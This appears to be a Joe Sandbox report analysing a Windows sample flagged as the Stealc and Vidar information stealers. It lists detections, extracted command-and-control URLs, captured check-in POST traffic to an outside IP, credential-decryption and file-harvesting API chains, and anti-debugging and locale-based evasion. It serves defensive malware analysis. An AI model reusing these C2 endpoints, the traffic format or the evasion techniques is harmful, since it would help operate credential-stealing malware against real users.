Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BnxBRWQWhy.exe

Overview

General Information

Sample name:BnxBRWQWhy.exe
renamed because original name is a hash value
Original sample name:ea6989e3a607d753377b05bae55140d8.exe
Analysis ID:1525312
MD5:ea6989e3a607d753377b05bae55140d8
SHA1:5c67ca11e96875c9beb0d320170e000698a65148
SHA256:9e857e6656ff0d6da789faa05f9fb49c323bdcea03b0b7887bbac919122f32fb
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
PE file has a writeable .text section
Searches for specific processes (likely to inject)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • BnxBRWQWhy.exe (PID: 6936 cmdline: "C:\Users\user\Desktop\BnxBRWQWhy.exe" MD5: EA6989E3A607D753377B05BAE55140D8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "http://193.233.112.44/383ccd496f3c5eee.php", "Botnet": "soft"}
{"C2 url": "https://t.me/hwlflcqshvwp/383ccd496f3c5eee.php", "Botnet": "soft"}
SourceRuleDescriptionAuthorStrings
BnxBRWQWhy.exeJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    BnxBRWQWhy.exeJoeSecurity_StealcYara detected StealcJoe Security
      SourceRuleDescriptionAuthorStrings
      dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
        SourceRuleDescriptionAuthorStrings
        00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000000.2106325851.0000000000731000.00000080.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
            00000000.00000002.2158782310.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
              Process Memory Space: BnxBRWQWhy.exe PID: 6936JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                Process Memory Space: BnxBRWQWhy.exe PID: 6936JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                  Click to see the 1 entries
                  SourceRuleDescriptionAuthorStrings
                  0.0.BnxBRWQWhy.exe.730000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    0.2.BnxBRWQWhy.exe.730000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                      No Sigma rule has matched
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-04T00:57:00.721287+020020442431Malware Command and Control Activity Detected192.168.2.649716193.233.112.4480TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: BnxBRWQWhy.exeAvira: detected
                      Source: BnxBRWQWhy.exeMalware Configuration Extractor: Vidar {"C2 url": "https://t.me/hwlflcqshvwp/383ccd496f3c5eee.php", "Botnet": "soft"}
                      Source: 0.0.BnxBRWQWhy.exe.730000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://193.233.112.44/383ccd496f3c5eee.php", "Botnet": "soft"}
                      Source: BnxBRWQWhy.exeReversingLabs: Detection: 50%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Source: BnxBRWQWhy.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_0073C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0073C820
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_00737240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00737240
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_00739AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00739AC0
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_00748EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00748EA0
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_00739B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00739B60
                      Source: BnxBRWQWhy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49714 version: TLS 1.2
                      Source: BnxBRWQWhy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_0073E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0073E430
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_007438B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_007438B0
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_00744570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00744570
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_0073ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0073ED20
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_00744910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00744910
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_0073BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0073BE70
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_0073DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0073DE10
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_007316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007316D0
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_0073F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0073F6B0
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_00743EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00743EA0
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_0073DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0073DA80

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49716 -> 193.233.112.44:80
                      Source: Malware configuration extractorURLs: http://193.233.112.44/383ccd496f3c5eee.php
                      Source: Malware configuration extractorURLs: https://t.me/hwlflcqshvwp/383ccd496f3c5eee.php
                      Source: global trafficHTTP traffic detected: GET /hwlflcqshvwp HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 91.214.78.145Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 193.233.112.44Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /383ccd496f3c5eee.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDGCFBAEGDHJKEBGCBAHost: 193.233.112.44Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 31 36 34 43 46 37 31 45 34 43 32 38 31 37 30 31 38 37 30 38 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 6f 66 74 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 2d 2d 0d 0a Data Ascii: ------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="hwid"86164CF71E4C2817018708------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="build"soft------CGDGCFBAEGDHJKEBGCBA--
                      Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                      Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                      Source: Joe Sandbox ViewASN Name: FREE-MPEIRU FREE-MPEIRU
                      Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.214.78.145
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.214.78.145
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.214.78.145
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.214.78.145
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.214.78.145
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.112.44
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.112.44
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.112.44
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.112.44
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.112.44
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.112.44
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.112.44
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_00734880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00734880
                      Source: global trafficHTTP traffic detected: GET /hwlflcqshvwp HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 91.214.78.145Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 193.233.112.44Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficDNS traffic detected: DNS query: t.me
                      Source: unknownHTTP traffic detected: POST /383ccd496f3c5eee.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDGCFBAEGDHJKEBGCBAHost: 193.233.112.44Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 31 36 34 43 46 37 31 45 34 43 32 38 31 37 30 31 38 37 30 38 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 6f 66 74 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 2d 2d 0d 0a Data Ascii: ------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="hwid"86164CF71E4C2817018708------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="build"soft------CGDGCFBAEGDHJKEBGCBA--
                      Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001024000.00000004.00000020.00020000.00000000.sdmp, BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.112.44
                      Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.112.44/
                      Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001006000.00000004.00000020.00020000.00000000.sdmp, BnxBRWQWhy.exe, 00000000.00000002.2158782310.000000000102F000.00000004.00000020.00020000.00000000.sdmp, BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.112.44/383ccd496f3c5eee.php
                      Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.112.44/383ccd496f3c5eee.php_lw
                      Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.112.44/W
                      Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.112.44/j
                      Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000000FF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.112.44/tion:
                      Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.112.44Rn
                      Source: BnxBRWQWhy.exe, 00000000.00000003.2128523908.0000000001035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.214.78.145
                      Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001024000.00000004.00000020.00020000.00000000.sdmp, BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.214.78.145/
                      Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.214.78.145/5
                      Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.214.78.145/x
                      Source: BnxBRWQWhy.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: BnxBRWQWhy.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: BnxBRWQWhy.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                      Source: BnxBRWQWhy.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                      Source: BnxBRWQWhy.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: BnxBRWQWhy.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: BnxBRWQWhy.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                      Source: BnxBRWQWhy.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                      Source: BnxBRWQWhy.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                      Source: BnxBRWQWhy.exeString found in binary or memory: http://ocsp.digicert.com0
                      Source: BnxBRWQWhy.exeString found in binary or memory: http://ocsp.digicert.com0A
                      Source: BnxBRWQWhy.exeString found in binary or memory: http://ocsp.sectigo.com0
                      Source: BnxBRWQWhy.exeString found in binary or memory: http://www.digicert.com/CPS0
                      Source: BnxBRWQWhy.exeString found in binary or memory: https://sectigo.com/CPS0
                      Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001006000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                      Source: BnxBRWQWhy.exe, 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmp, BnxBRWQWhy.exe, 00000000.00000003.2128523908.0000000001043000.00000004.00000020.00020000.00000000.sdmp, BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001006000.00000004.00000020.00020000.00000000.sdmp, BnxBRWQWhy.exe, 00000000.00000002.2158782310.000000000102F000.00000004.00000020.00020000.00000000.sdmp, BnxBRWQWhy.exe, 00000000.00000003.2128523908.0000000001035000.00000004.00000020.00020000.00000000.sdmp, BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/hwlflcqshvwp
                      Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/hwlflcqshvwps
                      Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001081000.00000004.00000020.00020000.00000000.sdmp, BnxBRWQWhy.exe, 00000000.00000002.2158782310.000000000102F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49714 version: TLS 1.2

                      System Summary

                      barindex
                      Source: BnxBRWQWhy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: String function: 007345C0 appears 318 times
                      Source: BnxBRWQWhy.exeStatic PE information: invalid certificate
                      Source: BnxBRWQWhy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@1/3
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_00749600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00749600
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_00743720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00743720
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\TTDMFW94.htmJump to behavior
                      Source: BnxBRWQWhy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: BnxBRWQWhy.exeReversingLabs: Detection: 50%
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                      Source: BnxBRWQWhy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_00749860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00749860
                      Source: BnxBRWQWhy.exeStatic PE information: real checksum: 0x54250 should be: 0x52de9
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_0074B035 push ecx; ret 0_2_0074B048
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_00749860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00749860

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-12416
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_0073E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0073E430
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_007438B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_007438B0
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_00744570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00744570
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_0073ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0073ED20
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_00744910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00744910
                      Source: C:\Users\user\Desktop\BnxBRWQWhy.exeCode function: 0_2_0073BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0073BE70
